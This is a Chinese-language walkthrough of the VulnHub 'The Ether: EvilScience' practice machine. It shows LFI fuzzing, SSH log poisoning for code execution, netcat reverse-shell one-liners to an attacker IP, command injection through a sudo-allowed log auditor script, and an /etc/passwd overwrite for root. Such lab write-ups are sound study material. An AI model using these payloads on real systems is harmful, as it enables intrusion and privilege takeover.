2. 程式人生 > 實用技巧 >evalsciencet靶機通關筆記

evalsciencet靶機通關筆記

阿新 發佈:2020-08-23

前言

好久沒打靶機了,這次找了一個還挺好玩的靶機,順便寫下筆記。

環境準備

靶機下載地址:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

本地作為攻擊方:192.168.199.119

靶機:未知具體ip (由於靶機用的是NAT模式),可以確定的是在192.168.199.0/24內。

資訊收集

先確定靶機ip

# nmap -sP 192.168.1.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 16:31 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.1.1
Host is up.
Nmap scan report for 192.168.1.131
Host is up (0.0010s latency).
MAC Address: 00:0C:29:26:01:D6 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00s latency).
MAC Address: 00:50:56:EF:D7:EB (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 31.83 seconds

掃描埠

# nmap -p- -A 192.168.1.131
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 16:38 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.1.131
Host is up (0.00063s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:26:01:D6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.63 ms 192.168.1.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.82 seconds

開放了22和80埠,emm大概就這些。

測試

首先先從web入手,開啟頁面http://192.168.1.131:80
![img](/image

翻閱後發現了一處疑似有檔案包含的地方

於是測試各種常見包含路徑,但是沒有什麼進展。

再測下能否遠端包含,在伺服器上放了一個info.php,內容為phpinfo();

但是也沒什麼變化。

接下來直接上fuzz大法,字典用SecLists中的檔案包含字典LFI-Jhaddix.txt

burp抓包後丟intruder

發現了幾個返回長度不一樣的包含路徑

逐一訪問後,發現除了/var/log/auth.log直接重定向到index.php,其他都是包含了一堆亂碼,沒什麼用。

抓包訪問包含/var/log/auth.log

既然能包含日誌檔案,那我們可以嘗試向日志文件寫入php程式碼,然後利用包含來執行getshell

通過ssh連線的使用者名稱來寫入日誌檔案

$ ssh ''@192.168.1.131
@192.168.1.131's password:
Permission denied, please try again.

執行命令ls試試

執行成功了,說明已經包含成功且執行了。

後面試了直接寫了個一句話,但是菜刀蟻劍都連不上,可能是php版本或者其他原因。。

還是直接nc反彈吧,本地先開啟nc監聽

# nc -lvp 999
listening on [any] 999 ...

加上引數 exec=/bin/nc -e /bin/bash 192.168.199.119 999

再加上url編碼

沒有反彈成功

看了下大佬的wp,說可能是因為版本的原因,-e引數沒有識別成功導致不能執行

於是試下沒有-e引數的命令

mknod backpipe p && nc 192.168.199.119 999 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc 192.168.199.119 999
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.199.119 999 0/tmp/

編碼後測試第一條就可以了

# nc -lvp 999
listening on [any] 999 ...
connect to [192.168.199.119] from DESKTOP-6GE3653.lan [192.168.199.119] 10140
ls
1.php
2.php
about.php
backpipe
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py

提權

先檢視下當前使用者

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

sudo -l 檢視當前許可權

sudo -l
Matching Defaults entries for www-data on theEther:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on theEther:
    (ALL) NOPASSWD: /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py
    (root) NOPASSWD: /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py

能夠執行xxxlogauditorxxx.py無需密碼

嘗試執行

sudo ./xxxlogauditorxxx.py
sudo ./xxxlogauditorxxx.py

===============================
Log Auditor
===============================
Logs available
-------------------------------
/var/log/auth.log
/var/log/apache2/access.log
-------------------------------

Load which log?:

輸入/var/log/auth.log看看有什麼

/var/log/auth.log
Jun  2 22:03:01 theEther sshd[1472]: Invalid user v1nt from 192.168.1.1
Jun  2 22:03:01 theEther sshd[1472]: input_userauth_request: invalid user v1nt [preauth]
Jun  2 22:03:04 theEther sshd[1472]: pam_unix(sshd:auth): check pass; user unknown
Jun  2 22:03:04 theEther sshd[1472]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.1

發現可以命令執行,並且許可權比www-data大

嘗試邏輯或執行命令 /var/log/auth.log|whoami

Load which log?: /var/log/auth.log|whoami
www-data

成功執行了,檢視下/etc/passwd

Load which log?: /var/log/auth.log|cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

也能成功執行。接著偽造/etc/passwd提權

openssl passwd -1 -salt vint abc123 #該命令用於生成hash,-1表示用MD5基於BSD的金鑰演算法。使用者名稱為vint,密碼是abc123

在原來的passwd加上,放到伺服器上

然後wget下載,再覆蓋掉原來的passwd

wget http://xxx.xxx.xxx.xxx:8081/passwd
ls
1.php
2.php
about.php
backpipe
images
index.php
layout
licence.txt
passwd
research.php
xxxlogauditorxxx.py

再覆蓋掉原來的passwd

Load which log?: /var/log/auth.log | cp passwd /etc/passwd

再檢視passwd

新增成功了。

最後切換到我們建立的使用者就可以了。

相關推薦

evalsciencet靶機通關筆記

前言 好久沒打靶機了,這次找了一個還挺好玩的靶機,順便寫下筆記。 環境準備

pWnOS v2.0 靶機測試筆記

1 http://10.10.10.100/login.php 存在sql注入 Username:[email protected]\' and extractvalue(1,concat(0x5c,(select database())))#

Wintermute-Neuromancer靶機測試筆記

Vulnhub-Wintermute-Neuromancer靶機地址 首先檔案目錄中readme說了需要單獨設定網段,只能通過另一臺靶機訪問,如果我們可以直接訪問那算作弊。。

Vulnhub-Tr0ll靶機筆記

vuhub Tr0ll官方下載地址 首先netdiscover nmap 發現ftp可匿名登入 robots.txt有目錄 首先ftp進去看有什麼東西

LFI-labs-master 通關筆記

LFI-labs-master 通關筆記 LFI-1 第一個沒有任何過濾,直接是將我們的page引數包含我們直接使用相對路徑“../../phpinfo.php” 包含我們想要執行的php檔案即可。

pikachu通關筆記

pikachu通關筆記 pikachu 暴力破解 基於表單的暴力破解 上burp直接剛 繞過驗證碼(on server)

dvwa通關筆記

dvwa通關筆記 Brute Force low: 直接上burp暴力破解 因為過濾較少,我們也可以考慮一手sql注入,萬能密碼登陸,username處輸入\'有報錯,輸入\"發現頁面正常,那麼這個地方首先判斷是肯定存在sql注入的,根據我們

攻防世界-高手進階區通關筆記

高手進階區-通關筆記 baby_web 根據提示:想想初始頁面是哪個 我們輸入index.php發現還是回到了1.php,應該是重定向了,此處有兩種思路

DVWA全級別通關筆記(二)-- Command Injection(命令注入)

引言 結合DVWA提供的命令注入模組,對命令注入漏洞進行學習總結。命令注入(Command Injection)是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。

xss-labs通關筆記

第一關 不使用過濾器 後臺程式碼 <!DOCTYPE html><!--STATUS OK--><html> <head>

紀元 變異 - 首輪初見劇情通關筆記

一】  最終總計遊戲時長20.3小時,奇蹟般地在大概一天半時間裡一鼓作氣推完了

upload-labs(11~12)通關筆記

upload-labs(11~12)通關筆記 環境準備 1、php版本 < 5.3.4 2、magic_quotes_gpc = Off php我用的是upload-labs官方推薦的5.2.17,搭建平臺用的是phpStudy2018。

太狠了,Spring全家桶筆記,一站式通關全攻略,利你利我利大家!!

Spring 早已成為 Java 後端開發事實上的行業標準,無數的公司選擇 Spring 作為基礎的開發框架,大部分Java 後端程式設計師在日常工作中也會接觸到 Spring ,因此,如何用好 Spring ,也就成為 Java 程式設

vue-hooks學習筆記(含原始碼解讀)

背景 hooks 百度翻譯為鉤子,不要把 Hooks 和 Vue 的 生命週期鉤子(Lifecycle Hooks) 弄混了,Hooks 是 React 在 V16.7.0-alpha 版本中引入的,而且幾天後 Vue 釋出了其概念驗證版本。

YYDispatchQueuePool原始碼筆記

工具作者在實際開發中,由於開了很多執行緒去做非同步繪製、下載等工作,而且有的執行緒可能因為資源鎖等待的原因,可能導致開更多的執行緒。當執行緒過多時,執行緒佔用了過多資源,可能導致主執行緒受影響,出現卡

JDK原始碼學習筆記——HashMap

JDK版本:13 參考 建議大家直接看這篇,寫的太好了~ 明星文章:美團技術團隊——Java 8系列之重新認識HashMap

SpringBoot學習筆記(二)——Spring周邊生態系統

摘要 在前面的兩篇文章中,分別講解了Spring的IOC容器原理,以及如何從零開始建立一個Spring容器。但是實際工作中,光有這些肯定是不夠的,還需要在這個基礎上再擴充套件資料庫、Redis快取、訊息佇列等。所以接下來

分散式系統系列學習筆記:MapReduce程式設計模型(附程式碼實現)

作者:小羊編輯:韓數 大家好,我是韓數,本文的作者是我的好朋友小羊,本次呢,特地邀請小羊大神來撰寫大資料系列的高階教程,隨著大資料的發展,越來越多優秀的開源框架逐漸進入到我們開發者的生活中,包括hadoop,

CMake學習筆記(一)基本概念介紹、入門教程及CLion安裝配置

什麼是構建系統 在軟體開發中,構建系統(build system)是用來從原始碼生成使用者可以使用的目標的自動化工具。目標可以包括庫、可執行檔案、或者生成的指令碼等等。

資料倉庫學習筆記(一)

美團OneData數倉 source: tech.meituan.com/2019/10/17/… Terms OneData: 阿里巴巴提出的數倉建設標準